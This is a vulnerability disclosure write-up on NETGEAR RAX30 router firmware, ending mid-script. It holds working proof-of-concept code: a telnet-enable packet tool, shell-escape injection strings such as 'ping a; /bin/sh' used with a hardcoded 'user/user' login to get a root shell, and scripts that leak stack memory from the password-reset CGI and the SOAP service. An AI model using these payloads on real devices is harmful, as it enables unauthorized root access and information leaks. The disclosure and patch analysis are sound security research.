SOAP Service HTTP Protocol Stack Buffer Overflow PSV-2023-0011 v1.0.10.94
SOAP Service SOAP Parameters Stack Buffer Overflow PSV-2023-0012 v1.0.10.94

The vulnerable firmware can be downloaded on NETGEAR’s website at RAX30-V1.0.7.78.zip and RAX30-V1.0.9.92.zip.

Advisories

NETGEAR published the following advisories covering the majority of these vulnerabilities:

Vulnerabilities

Telnet

By design, no shell to gain command line access to the router was documented by NETGEAR. However, it was observed that the binary /usr/bin/pu_telnetEnabled was running on port 23/udp on the router’s LAN side interface, which could receive a specially crafted packet to enable telnet.

Various researchers have previously analyzed this binary in the past, as seen at OpenWRT NETGEAR Telnet Console and GitHub NETGEARTelnetEnable. However, the provided code to enable telnet did not work for this specific NETGEAR RAX30 AX2400 model. This is because, for historical versions of /usr/bin/pu_telnetEnabled, the admin password was sent in plaintext after being decrypted, whereas on this version, the password was expected to be hashed using SHA-256 before encryption.

The /usr/bin/pu_telnetEnabled binary listened for a custom encrypted packet containing the device admin username, admin password and LAN MAC address. It was possible to reverse engineer the binary by extracting the binary from the firmware image that could be publicly downloaded from NETGEAR’s website. The exact specifics on the packet format and encryption used remained the same as detailed in OpenWRT NETGEAR Telnet Console.

The following C program (telnet_packet_encrypt.c) was used to encrypt the payload with the Blowfish algorithm and must be compiled with Rupan/blowfish.

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>
#include <stdbool.h>
#include "blowfish/blowfish.h"

// gcc telnet_packet_encrypt.c blowfish.c -o telnet_packet_encrypt

void printBuffer(uint8_t* buffer, int length)
{
    for (int i = 0; i < length; i++)
        printf("%02x", buffer[i]);
}

bool hexStringToBytes(char* hex, char* buffer, size_t bufferSize)
{
    size_t hexLength = strlen(hex);

    size_t index = 0;
    for (size_t i = 0; i < hexLength; i += 2)
    {
        if (index >= bufferSize)
            return false;
        sscanf(hex + i, "%2hhx",  buffer[index]);
        index++;
    }
    return true;
}

int main(int argc, char* argv[])
{
    if (argc != 3)
    {
        printf("Usage: %s <key> <hex-payload>", argv[0]);
        return 1;
    }

    char* key = argv[1];
    size_t keyLength = strlen(key);

    char* hexPayload = argv[2];
    size_t hexPayloadLength = strlen(hexPayload);

    // Ensure key is not empty
    if (strlen(key) <= 0)
    {
        printf("Error: Key parameter must not be empty.");
        return 2;
    }

    // Ensure hex payload is not empty
    if (hexPayloadLength != 0x80 * 2)
    {
        printf("Error: Payload parameter must be 0x80 bytes.");
        return 3;
    }

    // Ensure hex payload size is a multiple of 2
    if (hexPayloadLength % 2 != 0)
    {
        printf("Error: Payload parameter must be a valid hex string.");
        return 4;
    }

    // Get the hex payload as bytes
    size_t plaintextBufferSize = (size_t)(hexPayloadLength / 2);
    uint8_t* plaintextBuffer = (uint8_t*)malloc(plaintextBufferSize);
    hexStringToBytes(hexPayload, plaintextBuffer, plaintextBufferSize);

    // Initalise Blowfish
    BLOWFISH_CTX gContext;
    Blowfish_Init( gContext, key, keyLength);

    // Encrypt plaintextBuffer to encryptedBuffer
    uint32_t encryptedBuffer[plaintextBufferSize / sizeof(uint32_t)];
    uint8_t* pPlaintextCurrent = plaintextBuffer;
    for (uint8_t* pCurrent = (uint8_t*)encryptedBuffer; (uint64_t)pCurrent - (uint64_t)encryptedBuffer < plaintextBufferSize; pCurrent += 8)
    {
        uint8_t* pcVar2 = pCurrent - 1;
        uint8_t* pcVar6 = pPlaintextCurrent;
        uint8_t* pcVar7;
        do {
            pcVar7 = pcVar6 + 1;
            pcVar2 = pcVar2 + 1;
            *pcVar2 = *pcVar6;
            pcVar6 = pcVar7;
        } while (pcVar7 != pPlaintextCurrent + 8);
        Blowfish_Encrypt( gContext, (uint32_t*)pCurrent, (uint32_t*)(pCurrent + 4));
        pPlaintextCurrent += 8;
    }
    printBuffer((uint8_t*)encryptedBuffer, plaintextBufferSize);
    return 0;
}

The following Python3 script (pu_telnetenable.py) could then be executed to enable telnet on port 23/tcp on the router if the supplied username, password and MAC address are valid. This itself is not a vulnerability as it was hidden functionality implemented by NETGEAR and still required valid admin credentials in order to gain access to the shell.

import socket
import subprocess
import os
import argparse
import re
import sys
import Crypto.Hash.SHA256
import Crypto.Hash.MD5

import sys

class Logger:
    DEFAULT = '\033[0m'
    BLACK = '\033[0;30m'
    RED = '\033[0;31m'
    GREEN = '\033[0;32m'
    ORANGE = '\033[0;33m'
    BLUE = '\033[0;34m'
    PURPLE = '\033[0;35m'
    CYAN = '\033[0;36m'
    LIGHT_GRAY = '\033[0;37m'
    DARK_GRAY = '\033[1;30m'
    LIGHT_RED = '\033[1;31m'
    LIGHT_GREEN = '\033[1;32m'
    YELLOW = '\033[1;33m'
    LIGHT_BLUE = '\033[1;34m'
    LIGHT_PURPLE = '\033[1;35m'
    LIGHT_CYAN = '\033[1;36m'
    WIHTE = '\033[1;37m'

    @staticmethod
    def write(message = ''):
        print(message)

    @staticmethod
    def space():
        Logger.write()
    
    @staticmethod
    def fatal(code, message = ''):
        Logger.error(message)
        sys.exit(code)

    @staticmethod
    def error(message = ''):
        Logger.write(Logger.RED + '[-] ' + message + Logger.DEFAULT)

    @staticmethod
    def warning(message = ''):
        Logger.write(Logger.ORANGE + '[!] ' + message + Logger.DEFAULT)

    @staticmethod
    def info(message = ''):
        Logger.write(Logger.BLUE + '[#] ' + Logger.DEFAULT + message)

    @staticmethod
    def success(message = ''):
        Logger.write(Logger.GREEN + '[+] ' + Logger.DEFAULT + message)

class Payload:
    def __init__(self, username, password, mac, log = True):
        self.username = username
        self.password = password
        self.mac = mac
        self.signature = None

        # SHA256 Hash password
        self.sha256PasswordHash = Crypto.Hash.SHA256.new(self.password.encode('ascii')).digest().hex()

        # Create payload
        if log:
            Logger.info('Creating payload...')
        self.payload = self.create(log)

        # Encrypt payload
        if log:
            Logger.info('Encrypting payload...')
        self.encrypted = self.encrypt(log)

    # typedef struct {
    #     char signature[16];      // 0x00
    #     char mac[16];            // 0x10
    #     char username[16];       // 0x20
    #     char password[65];       // 0x30
    #     uint8_t reserved[15];    // 0x71
    # } Payload;
    def create(self, log = True):
        # Pad variables
        bMac = self.mac.encode('ascii').ljust(16, b'\x00')
        bUsername = self.username.encode('ascii').ljust(16, b'\x00')
        bPassword = self.sha256PasswordHash.encode('ascii').ljust(65, b'\x00')
        bReserved = b'\x00' * 15

        # Build content
        bContent = bMac + bUsername + bPassword + bReserved
        assert(len(bContent) == 0x70)

        # Build MD5 hash signature
        self.signature = Crypto.Hash.MD5.new(bContent).digest()
        bSignature = self.signature

        # Build payload
        bPayload = bSignature + bContent
        assert(len(bPayload) == 0x80)

        if log:
            Logger.info('')
            Logger.info('payload {')
            Logger.info('    signature: ' + bSignature.hex())
            Logger.info('    mac: ' + bMac.hex() + ' (' + bMac.decode('ascii') + ')')
            Logger.info('    username: ' + bUsername.hex() + ' (' + bUsername.decode('ascii') + ')')
            Logger.info('    password: ' + bPassword.hex() + ' (' + bPassword.decode('ascii') + ')')
            Logger.info('    reserved: ' + bReserved.hex())
            Logger.info('}')
            Logger.info('')

        return bPayload

    def encrypt(self, log = True):
        key = "AMBIT_TELNET_ENABLE+" + self.sha256PasswordHash

        # Encrypt the packet
        process = subprocess.Popen([os.path.dirname(os.path.realpath(__file__)) + '/telnet_packet_encrypt', key, self.payload.hex()], stdout=subprocess.PIPE)
        stdout, stderr = process.communicate()

        encryptedPayload = bytearray.fromhex(stdout.decode('ascii'))

        if log:
            Logger.info('')
            Logger.info('encrypted payload')
            for i in range(0, len(encryptedPayload), 8):
                Logger.info('    ' + encryptedPayload[i:i + 8].hex())
            Logger.info('')

        return encryptedPayload

    def send(self, ip, port):
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
        sock.sendto(self.encrypted, (ip, port))

class Validation:

    @staticmethod
    def validateUsername(username):
        if len(username) <= 0:
            return "admin"
        if len(username) > 16:
            Logger.fatal(1, 'Username exceeds the maximum length of 16.')
        return username

    @staticmethod
    def validatePassword(password):
        if password == None:
            return ""
        if len(password) > 65:
            Logger.fatal(2, 'Password exceeds the maximum length of 65.')
        return password

    @staticmethod
    def validateMac(mac):
        mac = mac.replace(':', '').upper()
        if not re.match(r"[A-F0-9]{12}", mac):
            Logger.fatal(3, 'MAC address is invalid.')
        return mac

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Enable telnet on NETGEAR RAX30 router.')
    parser.add_argument('--ip', default='192.168.1.1', help='The NETGEAR router IP address.')
    parser.add_argument('--port', default=23, type=int, help='The UDP port to connect to.')
    parser.add_argument('--username', default='admin', help='The account username.')
    parser.add_argument('--password', help='The account password.')
    parser.add_argument('--mac', required=True, help='The router LAN MAC address.')

    args = parser.parse_args()
    
    if os.name == 'nt':
        Logger.fatal(4, 'Windows not supported')

    # Validate and create payload    
    payload = Payload(
        Validation.validateUsername(args.username),
        Validation.validatePassword(args.password),
        Validation.validateMac(args.mac)
    )

    # Send payload
    Logger.info('Sending payload...')
    payload.send(args.ip, args.port)

    Logger.info('Payload sent!')

PSV-2023-0008 – Telnet Default Account Privilege Escalation Breakout

A default account command injection breakout vulnerability was present in the /lib/libcms_cli.so library imported by the custom NETGEAR /bin/telnetd binary running on port 23/tcp. By default, this port is not open in the firewall, and therefore it must be opened in order to leverage this vulnerability. This port could be opened by the hidden /usr/bin/pu_telnetEnabled service running on port 23/udp, as discussed previously, or by another vulnerability.

Authentication

The NETGEAR router ships with a default “user” account, which has a hardcoded password of “user”. Standard authentication of this user to telnet provides you with a telnet console that has a limited number of commands:

┌──(kali㉿kali)-[~]
└─$ nc 192.168.2.1 23
!BCM96750 Broadband Router
Login: user
Password: user
> help
help
?
help
logout
exit
quit
reboot
exitOnIdle
ping
lanhosts
passwd
restoredefault
save
swversion
uptime
wan
> sh
telnetd::214.801:error:processInput:384:unrecognized command sh

As you can see, by default, the user only has permission to run a small number of commands and cannot execute the hidden “sh” command due to incorrect account permissions.

Shell Escape

The /lib/libcms_cli.so library handles the command line command received by the user in the cli_processCliCmd function. This function checks the first word of the command against a list of commands in the libraries data section, which are stored using the following C Command structure:

struct Command
{
    char * name;
    char * description;
    uint8_t permission;
    uint8_t lock;
    uint8_t field4_0xa;
    uint8_t field5_0xb;
    void * execute;
};

The structure data in the binary for the vulnerable ping command structure is seen below:

00039d98 23 5b 02 00 23  Command                           [27]
        5b 02 00 c1 00 
        00 00 00 00 00
    00039d98 23 5b 02 00     char *    s_ping_00025b15+14      name          = "ping"
    00039d9c 23 5b 02 00     char *    s_ping_00025b15+14      description   = "ping"
    00039da0 c1              uint8_t   C1h                     permission
    00039da1 00              uint8_t   '\0'                    lock
    00039da2 00              uint8_t   '\0'                    field4_0xa
    00039da3 00              uint8_t   '\0'                    field5_0xb
    00039da4 00 00 00 00     void *    00000000                execute

ping is a command the user has permission to access, and additionally, it has a NULL execute function pointer. Therefore, the code executes the command directly as a shell command [1], as shown in the following cli_processCliCmd function:

int cli_processCliCmd(char *command)
{
    int ret = 0;

    char _command [4096];
    memset(_command,0,4096);
    int cmp = strncasecmp(command, "netctl", 6);
    if (cmp == 0) {
        command = command + 7;
    }

    // Copy command to local buffer
    strcpy(_command, command);
    size_t commandLength = strlen(_command);

    // Calculate the command first word length
    size_t givenCommandFirstWordLength = 0;
    char* commandName = _command;
    while ((givenCommandFirstWordLength != commandLength    (*commandName != ' '))) {
        givenCommandFirstWordLength = givenCommandFirstWordLength + 1;
        commandName = commandName + 1;
    }

    // Find command in command list
    uint8_t currentPermission = currPerm;
    int commandIndex = 0;
    Command *pCommand = pCommands;
    while (true) {
        commandName = pCommand->name;
        size_t commandNameLength = strlen(commandName);

        if (((commandNameLength == givenCommandFirstWordLength)   
            (ret = strncasecmp(_command, commandName, givenCommandFirstWordLength), ret == 0))   
            ((currentPermission   pCommand->permission) != 0)) break;

        commandIndex++;
        pCommand++;
        if (commandIndex == 0x32) {
            return 0;
        }
    }

    [TRUNCATED]

    // [1] If the command has no function pointer, execte command in shell
    if ((code *)pCommands[commandIndex].execute == (code *)0x0) {
        prctl_runCommandInShellWithTimeout(_command);                // <--- [1]
    } else {
        char* args;
        if (givenCommandFirstWordLength == commandLength) {
            args = _command + givenCommandFirstWordLength;
        } else {
            args = _command + givenCommandFirstWordLength + 1;
        }

        // Otherwise execute function pointer
        (*(code *)pCommands[commandIndex].execute)(args);
    }

    [TRUNCATED]
    return 1;
}

No data validation is performed on the command being executed; therefore, we can provide various injection characters to execute another command.

The following list is a subset of injection examples:

  • ping a; /bin/sh
  • ping 127.0.0.1 /bin/sh
  • ping a || /bin/sh
  • ping $(touch /tmp/example)
  • ping `/tmp/example`
  • ping a | touch /tmp/example

The following output snippet shows the command injection vulnerability being leveraged to gain a root/admin shell:

┌──(kali㉿kali)-[~]
└─$ nc 192.168.1.1 23
!BCM96750 Broadband Router
Login: user
Password: user
 > ping -c aa; /bin/sh
ping: invalid number 'aa'


BusyBox v1.31.1 (2022-03-04 19:12:56 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# cat /etc/passwd
admin:<redacted>:0:0:Administrator:/:/bin/sh
support:$1$QkcawmV.$VU4maCah6eHihce5l4YCP0:0:0:Technical Support:/:/bin/sh
user:$1$9RZrTDt7$UAaEbCkq.Qa4u0QwXpzln/:0:0:Normal User:/:/bin/sh
nobody:<redacted>:0:0:nobody for ftp:/:/bin/sh

Web Application

The web application allowed consumers to login to the website and manage their router on the LAN/WLAN interface through a browser. The majority of the web application functionality was only accessible from an authenticated user, however some functionality was accessible as an unauthenticated user.


PSV-2022-???? – JSON Response Stack Data Leak

A memory read leak vulnerability existed in the unauthenticated web /webs/pwd_reset/reset_pwd.cgi binary which ran by default on the LAN interface of the RAX30 router. This binary is a custom NETGEAR CGI binary which handled unauthenticated password reset HTTP requests through the HTTP server.

This leak allowed you to read approximately 12 bytes from the stack before reaching a NULL byte.

Analysis

The handle_checkSN (0x015f70) function is shown below and handled a serial number check request as part of the reset password process. When the JSON parameter serialNumber was not found [2], the request JSON body [3] was passed as the error message to jsonResponse (0x0012cac) [4].

void handle_checkSN(int jsonData)
{
    fprintf(stderr,"CGI_DEBUG> %s:%d: Enter check serial number...\n","cgi_device.c",0xb5);
    int serialNumberObj;

    // Do not provide the "serialNumber" key to ensure we hit the following if statement
    int iVar1 = json_object_object_get_ex(jsonData,"serialNumber", serialNumberObj); // <--- [2]
    if (iVar1 == 0) {
        fprintf(stderr,"CGI_ERROR> %s:%d: Failed to parse the input JSON data no serialNumber!!!\n","cgi_device.c",0xd5);
        // The json is retrieved from the "data" key
        char *message = json_object_get_string(jsonData);                            // <--- [3]

        // JSON string is passed to jsonResponse
        jsonResponse("error",message);                                               // <--- [4]
        fprintf(stderr,"CGI_DEBUG> %s:%d: Exit check serial number...\n","cgi_device.c",0xd9);
    }
    else {
        [TRUNCATED]
    }
    return;
}

This function allocated a buffer of 1024 bytes on the stack [5] for the response string and then copied 1023 bytes from the JSON request to the buffer [6]. However, no NULL terminator was set at the end of the buffer, therefore when providing a request of more than 1024 bytes, no NULL value was present to terminate the string and the data following the string was leaked until a NULL byte was found when printed with printf [7].

void jsonResponse(char *status,char *message)
{
    // Buffer of size 1024
    char buffer [1024];                                      // <--- [5]

    int uVar1 = json_object_new_object();
    int uVar2 = json_object_new_string(status);
    json_object_object_add(uVar1, "status", uVar2);
    uVar2 = json_object_new_string(message);
    json_object_object_add(uVar1, "message", uVar2);
    char *json = json_object_to_json_string_ext(uVar1, 2);

    // Copy first 1023 bytes of JSON string to buffer
    strncpy(buffer, json, 1023);                             // <--- [6]

    // No NULL terminator is set at buffer[1024] = '\0', buffer is outputted to response
    printf("Content-Type: application/json\n\n%s", buffer);  // <--- [7]
    json_object_put(uVar1);
    return;
}

HTTP Requests

The following request of 971 A characters in the JSON data field value caused the server to respond with leaked memory data. Only 971 characters were required because of the additional characters appended by the server in the JSON response which in total resulted in 1024 bytes.

POST /pwd_reset/reset_pwd.cgi HTTP/1.1
Host: 192.168.2.1
Content-Length: 1008

{"function":"checkSN","data":{"":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}}

The excess binary data could be seen after the JSON response:

HTTP/1.1 200 OK
Content-Type: application/json
[TRUNCATED]
Content-Length: 1035
Server: lighttpd/1.4.59

{
  "status":"error",
  "message":"{ \"\": \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\" }"
}¶Ø}ƒ¶ /+Àw

Python Proof of Concept Script

The following proof of concept script (reset_pw_check_sn_leak.py) triggers the leak.

#!/usr/bin/env python3

import argparse
import requests
import urllib3

if __name__ == "__main__":
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    parser = argparse.ArgumentParser(description='Leak memory from the web server on NETGEAR RAX30 router.')
    parser.add_argument('--ip', default='192.168.0.1', help='The NETGEAR router web IP.')

    args = parser.parse_args()

    print('Leaking data...')
    limit = 30
    for i in range(0, limit):
        payload = 'A' * 971
        response = requests.post('http://' + args.ip + '/pwd_reset/reset_pwd.cgi', json={
            'function': 'checkSN',
            'data': {
                '': payload
            }
        }, verify=False)

        if b'status":"error' in response.content:
            overflow = response.content[1023:]
            print(str(i + 1) + '/' + str(limit) + ': ' + " ".join(["{:02x}".format(x) for x in overflow]))
        else:
            print('Received unexpected response from server!')

Upon executing this script, we can see the leaked memory bytes containing memory pointers.

└─$ python3 reset_pw_check_sn_leak.py
Leaking data...
1/10: b6 d8 0d 81 b6 28 8f e2 01 c0 77 01
2/10: b6 d8 0d 82 b6 28 1f 4c
3/10: b6 d8 cd 84 b6 28 3f ba
4/10: b6 d8 ad 84 b6 28 5f 59
5/10: b6 d8 7d 7e b6 28 df a6 01 c0 77 01
6/10: b6 d8 fd 80 b6 28 af 65
7/10: b6 d8 6d 87 b6 28 1f b1 01 c0 77 01
8/10: b6 d8 dd 87 b6 28 ff a9 01 c0 77 01
9/10: b6 d8 4d 7d b6 28 9f bf
10/10: b6 d8 3d 87 b6 28 cf 8e 01 c0 77 01

Patch v1.0.9.92

The buffer stack variable is now initialized with NULL bytes and as only 1023 bytes are copied from the JSON string, the buffer will always have a NULL terminator.

void jsonResponse(char *status,char *message)
{
    // Buffer of size 1024
    char buffer [1024];
    memset(buffer, 0, 1024);
    ...
    strncpy(buffer, json, 1023);
}

SOAP Service

A HTTPS SOAP service (/bin/soap_serverd) runs by default on port LAN 5043/tcp. The custom NETGEAR SOAP service handles HTTPS requests from the Nighthawk App when the mobile device is connected to the router on the LAN/WLAN interface. The /bin/soap_serverd binary auto-restarts after approximately 15 seconds when it has terminated or crashed.

Checking the /bin/soap_serverd binary with checksec.py shows the following protections are set:

└─$ checksec --file bin/soap_serverd 
[*] '/bin/soap_serverd'
    Arch:     arm-32-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    FORTIFY:  Enabled

The presence of these mitigation’s cause many vulnerabilities to be ineffective on their own and usually require multiple vulnerabilities to be chained together to overcome.

For example, a stack canary inserts a random 4 byte value at the end of the stack variables and therefore any stack buffer overflow vulnerabilities will corrupt this value before corrupting important stack values such as the next return pointer. A check occurs at the end of each function to validate the stack canary is not corrupted, however if it is corrupt, the binary will terminate with the error message “Stack smashing detected”.

Address layout randomization (ASLR) is enabled which changes the base address of the main executable, libraries and the heap each time the executable is ran. Therefore, hard-coded addresses cannot be used in the vulnerability payload and instead a separate leak vulnerability is required.


PSV-2023-0009 – Write HTTP Response Stack Pointer Leak

Analysis

A stack pointer leak vulnerability exists within the writeHttpResponse (0x0018b4c) function which handles sending the HTTP response to the API request. The vulnerability occurs due to the executing of strncat [8] on the stack buffer response without initialising the buffer with data. Therefore, if any data exists in memory at the response stack location that does not start with a NULL byte, that data will be sent in the HTTP response before the main HTTP response.

void writeHttpResponse(UnkArg *param_1, int httpCode, char *httpCodeStr, int param_4, char *message)
{
    size_t responseLen;
    char buffer [128];
    char response [1024];

    _writeHttpHeaders(httpCode, httpCodeStr, param_4, "text/html");
    memset(buffer, 0, 0x80);
    __snprintf_chk(buffer, 0x80, 1, 0x80, "<HTML><HEAD><TITLE>%d %s</TITLE></HEAD>\n<BODY BGCOLOR=\"#cc9999\"><H4>%d %s</H4>\ n", httpCode, httpCodeStr, httpCode, httpCodeStr);
    strncat(response, buffer, 0x80); // Buffer is appended to any existing data in the response variable  <--- [8]
    memset(buffer, 0, 0x80);
    __snprintf_chk(buffer, 0x80, 1, 0x80, "%s\n", message);
    strncat(response, buffer, 0x80);
    memset(buffer, 0, 0x80);
    __snprintf_chk(buffer, 0x80, 1, 0x80, "<HR>\n<ADDRESS><A HREF=\"%s\">%s</A></ADDRESS>\n</BODY></HTML>\n", "http://schemas.xmlsoap.org/soap/encoding/", "\"OS/version\" UPnP/1.0 \"product/version\"");
    strncat(response, buffer, 0x80);
    responseLen = strlen(response);
    __fprintf_chk(param_1->file, 1, response, responseLen);
    return;
}

HTTP Requests

To trigger the stack pointer leak, a valid SOAP request with a large SOAPAction buffer is sent to the SOAP service to create a large HTTP response. This is done to avoid NULL bytes truncating the amount of data that is leaked.

POST /soap/server_sa/ HTTP/1.0
User-Agent: ksoap2-android/2.6.0+
SOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Content-Length: 443
Host: 192.168.2.1:5043

<!--?xml version="1.0" encoding= "UTF-8" ?-->
<v:Envelope xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:d="http://www.w3.org/2001/XMLSchema" xmlns:c="http://schemas.xmlsoap.org/soap/encoding/" xmlns:v="http://schemas.xmlsoap.org/soap/envelope/">
    <v:Header>
        <SessionId></SessionId>
    </v:Header>
    <v:Body>
        <n0:GetInfo xmlns:n0="urn:NETGEAR-ROUTER:service:DeviceInfo:1" />
    </v:Body>
</v:Envelope>

Next, an invalid request is made to trigger the writeHttpResponse function call which returns the HTTP response with the leaked data preceding it.

INVALID /soap/server_sa/ HTTP/1.0
User-Agent: ksoap2-android/2.6.0+
Content-Length: 0
Host: 192.168.2.1:5043

The resulting response outputs the leaked memory before the HTTP response, including a stack address pointer:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAResponse
        xmlns:m="urn:NETGEAR-ROUTER:service:DeviceInfo:1">
    <¨È×¾HTTP/1.1 400 Bad Request
Server: "OS/version" UPnP/1.0 "product/version"
Date: Fri, 02 Dec 2022 01:07:47 GMT
Content-Type: text/html
Connection: close

<HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD>
<BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>
That method is not handled by us.
<HR>
<ADDRESS><A HREF="http://schemas.xmlsoap.org/soap/encoding/">"OS/version" UPnP/1.0 "product/version"</A></ADDRESS>
</BODY>

Python Proof of Concept Script

The following proof of concept script (soap_cat_memory_leak.py) can be executed to leak the stack address range and stack pointer address on firmware version v1.0.9.92.

#!/usr/bin/env python3

import argparse
import requests
import urllib3
import struct
import ssl
import socket

def sendLargeBuffer(url, length):

    payload = 'A' * length

    headers = {
        'User-Agent': 'ksoap2-android/2.6.0+',
        'SOAPAction': 'urn:NETGEAR-ROUTER:service:DeviceInfo:1#' + payload,
        'Content-Type': 'text/xml;charset=utf-8',
    }

    xml = """
    <!--?xml version="1.0" encoding= "UTF-8" ?-->
    <v:Envelope xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:d="http://www.w3.org/2001/XMLSchema" xmlns:c="http://schemas.xmlsoap.org/soap/encoding/" xmlns:v="http://schemas.xmlsoap.org/soap/envelope/">
        <v:Header>
            <SessionId></SessionId>
        </v:Header>
        <v:Body>
            <n0:GetInfo xmlns:n0="urn:NETGEAR-ROUTER:service:DeviceInfo:1" />
        </v:Body>
    </v:Envelope>
    """

    requests.post(url, data=xml, headers=headers, verify=False)

def triggerMemoryLeak(hostname, port):
    request = """INVALID /soap/server_sa/ HTTP/1.0
User-Agent: ksoap2-android/2.6.0+
Content-Length: 0
Host: """+hostname+""":"""+str(port)+"""

"""

    # Create SSL context
    cxt = ssl.create_default_context()
    cxt.check_hostname = False
    cxt.verify_mode = ssl.CERT_NONE

    # HTTPS Request
    response = b""
    with socket.create_connection((args.domain, args.port)) as sock:
        with cxt.wrap_socket(sock, server_hostname=args.domain) as ssock:
